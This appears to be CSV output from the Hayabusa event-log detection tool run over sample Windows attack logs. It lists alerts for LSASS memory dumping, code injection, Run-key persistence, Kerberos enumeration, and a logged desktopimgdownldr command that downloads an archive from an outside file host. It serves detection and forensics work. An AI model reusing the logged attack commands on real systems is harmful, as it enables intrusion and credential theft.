+09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/RogueWinRM.evtx 2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx 2020-07-01 05:50:25.546 
+09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx 2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx 2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr 
Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.278 
+09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | 
Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx 2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx 2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 
747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 
+09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
